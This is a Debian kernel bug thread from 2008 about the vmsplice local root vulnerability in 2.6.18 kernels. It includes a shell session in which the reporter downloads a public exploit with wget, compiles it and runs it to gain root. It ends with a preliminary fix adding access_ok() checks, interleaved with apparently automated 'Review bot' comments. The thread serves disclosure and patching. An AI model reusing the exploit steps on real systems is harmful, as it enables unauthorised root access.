Old 02-09-2008, 11:19 PM
Okulov Vitaliy
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Package: linux-image-2.6.18-6-686
Version: 2.6.18.dfsg.1-17etch1
Severity: critical
Tags: security
Justification: root security hole


Just tried the exploit from http://www.milw0rm.com/exploits/5092 on my
linux-image-2.6.18-5-686 kernel. And it works. Please backport the patch
from the 2.6.24.1 kernel (CVE-2008-0009/10).

-- System Information:
Debian Release: 4.0
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages linux-image-2.6.18-6-686 depends on:
ii coreutils 5.97-5.3 The GNU core utilities
ii debconf [debconf-2.0] 1.5.11etch1 Debian configuration management sy
ii initramfs-tools [linux-initr 0.85h tools for generating an initramfs
ii module-init-tools 3.3-pre4-2 tools for managing Linux kernel mo

Versions of packages linux-image-2.6.18-6-686 recommends:
ii libc6-i686 2.3.6.ds1-13etch4 GNU C Library: Shared libraries [i

-- debconf information:
shared/kernel-image/really-run-bootloader: true
linux-image-2.6.18-6-686/preinst/elilo-initrd-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/already-running-this-2.6.18-6-686:
linux-image-2.6.18-6-686/postinst/depmod-error-2.6.18-6-686: false
linux-image-2.6.18-6-686/preinst/initrd-2.6.18-6-686:
linux-image-2.6.18-6-686/postinst/old-initrd-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/bootloader-initrd-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/abort-install-2.6.18-6-686:
linux-image-2.6.18-6-686/preinst/lilo-has-ramdisk:
linux-image-2.6.18-6-686/preinst/overwriting-modules-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/bootloader-error-2.6.18-6-686:
linux-image-2.6.18-6-686/prerm/would-invalidate-boot-loader-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/bootloader-test-error-2.6.18-6-686:
linux-image-2.6.18-6-686/postinst/create-kimage-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/depmod-error-initrd-2.6.18-6-686: false
linux-image-2.6.18-6-686/preinst/lilo-initrd-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/old-dir-initrd-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/failed-to-move-modules-2.6.18-6-686:
linux-image-2.6.18-6-686/preinst/abort-overwrite-2.6.18-6-686:
linux-image-2.6.18-6-686/prerm/removing-running-kernel-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/old-system-map-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/kimage-is-a-directory:



--
To UNSUBSCRIBE, email to debian-kernel-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
 
Old 02-10-2008, 07:48 AM
Stefan Fritsch
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

> Just tried the exploit from http://www.milw0rm.com/exploits/5092 on my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport the patch
> from the 2.6.24.1 kernel (CVE-2008-0009/10).

2.6.24.1 does not fix the issue, see

http://marc.info/?l=linux-kernel&m=120262352612128&w=2

I have also verified that the lenny 2.6.22 kernel is vulnerable.
 
Old 02-10-2008, 08:14 AM
Stefan Fritsch
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

I also checked that linux-image-2.6.18-5-k7 2.6.18.dfsg.1-17 is
vulnerable.
 
Old 02-10-2008, 08:15 AM
Florian Weimer
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

* Okulov Vitaliy:

> Just tried the exploit from http://www.milw0rm.com/exploits/5092 on my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport the patch
> from the 2.6.24.1 kernel (CVE-2008-0009/10).

Milw0rm is down. Are you sure the exploit is real? The vulnerable code
is not present in the 2.6.18 kernel.




 
Old 02-10-2008, 08:27 AM
"Vitaliy Okulov"
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Yep, I'm sure.

Copy of exploit: http://www.securityfocus.com/bid/27704/exploit


doktor@doktor:~/coding/sample$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c

--12:25:09-- http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
* => `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23

Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[=================================================================================================================>] 6,264 28.84K/s


12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]

doktor@doktor:~/coding/sample$ vi 27704.c
doktor@doktor:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux

doktor@doktor:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)
doktor@doktor:~/coding/sample$ head -n 20 27704.c

/*
** jessica_biel_naked_in_my_bed.c
**
** Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
** Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
** Stejnak je to stare jak cyp a aj jakesyk rozbite.
**
** Linux vmsplice Local Root Exploit
** By qaaz
**
** Linux 2.6.17 - 2.6.24.1
**
** This is quite old code and I had to rewrite it to even compile.
** It should work well, but I don't remeber original intent of all
** the code, so I'm not 100% sure about it. You've been warned
**
** -static -Wno-format
**/
#define _GNU_SOURCE
#include <stdio.h>
doktor@doktor:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl

doktor@doktor:~/coding/sample$ ./root_expl
-----------------------------------
*Linux vmsplice Local Root Exploit
*By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20

[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
root@doktor:~/coding/sample# id
uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(doktor),1001(shutdown),1002(vboxusers)

root@doktor:~/coding/sample# exit
doktor@doktor:~/coding/sample$

So exploit works.


2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
> * Okulov Vitaliy:
>
> > Just tried the exploit from http://www.milw0rm.com/exploits/5092 on my
> > linux-image-2.6.18-5-686 kernel. And it works. Please backport the patch
> > from the 2.6.24.1 kernel (CVE-2008-0009/10).
>
> Milw0rm is down. Are you sure the exploit is real? The vulnerable code
> is not present in the 2.6.18 kernel.
 
Old 02-10-2008, 08:32 AM
Florian Weimer
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

* Vitaliy Okulov:

> Yep, im sure.

Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.



 
Old 02-10-2008, 08:39 AM
"Vitaliy Okulov"
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Hm, maybe, but I read http://www.securityfocus.com/bid/27705/solution

"The vendor released version 2.6.24.1 to address these issues. Please see the references for more information."



And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1 where I found only 1 bugfix for vmsplice.

2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
> * Vitaliy Okulov:
>
> > Yep, I'm sure.
>
> Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
 
Old 02-10-2008, 08:49 AM
"Vitaliy Okulov"
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Oh, just reread http://marc.info/?l=linux-kernel&m=120262352612128&w=2

There is no bugfix.

Wait for Jens Axboe to fix this patch.


2008/2/10, Vitaliy Okulov <vitaliy.okulov@gmail.com>:
> Hm, maybe, but I read http://www.securityfocus.com/bid/27705/solution
>
> "The vendor released version 2.6.24.1 to address these issues. Please see the references for more information."
>
> And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1 where I found only 1 bugfix for vmsplice.
>
> 2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
> > * Vitaliy Okulov:
> >
> > > Yep, I'm sure.
> >
> > Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
 
Old 02-10-2008, 08:53 AM
Florian Weimer
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

* Vitaliy Okulov:

> Oh, just reread http://marc.info/?l=linux-kernel&m=120262352612128&w=2
>
> There is no bugfix.

Yes, it appears to be a different bug.



 
Old 02-10-2008, 11:00 AM
Bastian Blank
 
Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

tags 464945 patch

On Sun, Feb 10, 2008 at 03:19:20AM +0300, Okulov Vitaliy wrote:
> Just tried the exploit from http://www.milw0rm.com/exploits/5092 on my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport the patch
> from the 2.6.24.1 kernel (CVE-2008-0009/10).

Preliminary patch, it includes more checks than the update in 2.6.24.1.

It at least fixes the exploit.

Bastian
diff --git a/fs/splice.c b/fs/splice.c
index 684bca3..2d7e598 100644
--- a/fs/splice.c
+++ b/fs/splice.c
@@ -1122,6 +1122,11 @@ static int get_iovec_page_array(const struct iovec __user *iov,
size_t len;
int i;

+ if (!access_ok(VERIFY_READ, iov, sizeof(struct iovec))) {
+ error = -EFAULT;
+ break;
+ }
+
/*
* Get user address base and length for this iovec.
*/
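Review bot: the early-exit path in this hunk sets `error = -EFAULT` and breaks, but `error` is not declared in the visible context, so confirm that the loop's exit path returns it to the caller rather than a partial page count; otherwise a rejected iovec would be silently ignored instead of failing the call. The access_ok() on `iov` covers only the one struct iovec read in this iteration, which is the right scope given the loop advances `iov`, but if the reads of iov_base and iov_len that follow the "Get user address base and length" comment use the unchecked __get_user() variants, switching them to get_user() would make the validation self-contained and harder to drop in a later cleanup.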
@@ -1141,6 +1146,11 @@ static int get_iovec_page_array(const struct iovec __user *iov,
if (unlikely(!base))
break;

+ if (!access_ok(VERIFY_READ, base, len)) {
+ error = -EFAULT;
+ break;
+ }
+
/*
* Get this base offset and number of pages, then map
* in the user pages.
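Review bot: the range check `access_ok(VERIFY_READ, base, len)` is the one that actually stops a kernel address from being handed to the page-mapping code below, yet it carries no comment saying why it must stay; add a one-line comment stating that this path maps user pages directly and cannot rely on a later copy_from_user() to fault, so the check is not removed as redundant. Since `len` is user-controlled here, the check also depends on access_ok() handling `base + len` wrap-around on every architecture that builds this file; given the patch is described as preliminary and as adding more checks than the 2.6.24.1 update, the commit message should spell out that assumption.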
 
